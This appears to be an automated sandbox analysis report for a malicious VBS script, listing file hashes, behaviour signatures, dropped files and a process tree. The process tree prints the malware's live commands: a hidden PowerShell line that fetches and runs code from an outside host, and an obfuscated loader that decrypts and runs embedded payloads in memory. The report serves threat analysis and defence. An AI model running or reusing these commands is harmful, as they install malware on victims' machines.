Overview

overview

10

Static

static

1

051bcd80b8...20.vbs

windows7-x64

8

051bcd80b8...20.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13-12-2024 02:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320.vbs

  • Size

    91KB

  • MD5

    7f67c01cf304afa0adf4c3095477ab07

  • SHA1

    9c5e5e550e15b4e0e949591488ba72154e13378f

  • SHA256

    051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320

  • SHA512

    cbcf82588439f81719c5931b08176de77e3c7d08e22c084836ee3224dbbc6a96ebb4873cb2ac1d6d0225b6f7a8f8cef873fab3b54115e4cd8eb0ec1b623a7737

  • SSDEEP

    1536:M8we4uQyXKFD5cFkWLcaxdYOyhGhRW9w+vcdlziIqzRNBHarEZ+2K:M8z4DOOW4eOFGhRW9wCIzi/8rE42K

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2884
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2132
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2536
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('emte3ttqtxU8Z7uNtvShj79DDsvggmbvOto5AmNpef0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UMzwlReo+QuIcZAVBvu6GA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vpydZ=New-Object System.IO.MemoryStream(,$param_var); $whvQX=New-Object System.IO.MemoryStream; $NaCjv=New-Object System.IO.Compression.GZipStream($vpydZ, [IO.Compression.CompressionMode]::Decompress); $NaCjv.CopyTo($whvQX); $NaCjv.Dispose(); $vpydZ.Dispose(); $whvQX.Dispose(); $whvQX.ToArray();}function execute_function($param_var,$param2_var){ $JNCLx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MwOUn=$JNCLx.EntryPoint; $MwOUn.Invoke($null, $param2_var);}$toRQS = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $toRQS;$arTVC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($toRQS).Split([Environment]::NewLine);foreach ($ixRtZ in $arTVC) { if ($ixRtZ.StartsWith(':: ')) { $rZGXb=$ixRtZ.Substring(3); break; }}$payloads_var=[string[]]$rZGXb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1680

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\system.bat
    Filesize

    82KB

    MD5

    91521a30afc250ec301fbee04e3d72ec

    SHA1

    20c0d5e15643df6215f5052d70ad46d40da15fdd

    SHA256

    87f7bfaaf8f6babc9af3cb2b5de96b6365016121332bd90b8905674acd4940c4

    SHA512

    f9c61a01395eccccbb62ba2ce9cce4678da36b5a67a9712af98965c75cf126a740026bce576fe841b18ba018641842f845c007ad9e62dbde96b5cfd3b5299544

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    c357e812c6aa82485c5e7411439a4b0f

    SHA1

    12746cc46dec89bfa6ffa6acc387bf3c136eadd5

    SHA256

    4d5b2666964c4b34461822fca65bc2beb8e5e224812b0e11c977ade4f3a472e5

    SHA512

    687e3d50dc9f735d40a3cbcdf495e30abbdd888d861f61192822639182ca76b4f3b2245b00f2b4d54c74658a5c7ef7c51d48384995c43d741f3436f5c22d5967

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K06DCNTF2E9EJATIUT7B.temp
    Filesize

    7KB

    MD5

    e8ea1420c425eccb4cfc2c9e30cd4e7e

    SHA1

    a36a4c26392d2c7ee84b7d05700c6beec454932c

    SHA256

    82ca555ff8dc40e275789e4e29881d3c9a8583218b69af8689fa5e0fe68f3af8

    SHA512

    7622e651c59bcc10f92b980d07af9b9c8b093f77d64c8c85f62b47843c41000881383fff91876a0ad448021327cb3b2f88461c2880011f2c48fa4ca15111b047

    Download Submit

  • memory/1680-27-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1680-26-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2132-7-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2132-11-0x0000000002E3B000-0x0000000002EA2000-memory.dmp

    Filesize

    412KB

    Download

  • memory/2132-9-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2132-10-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2132-8-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2132-4-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2132-6-0x0000000002860000-0x0000000002868000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2132-5-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

    Filesize

    2.9MB

    Download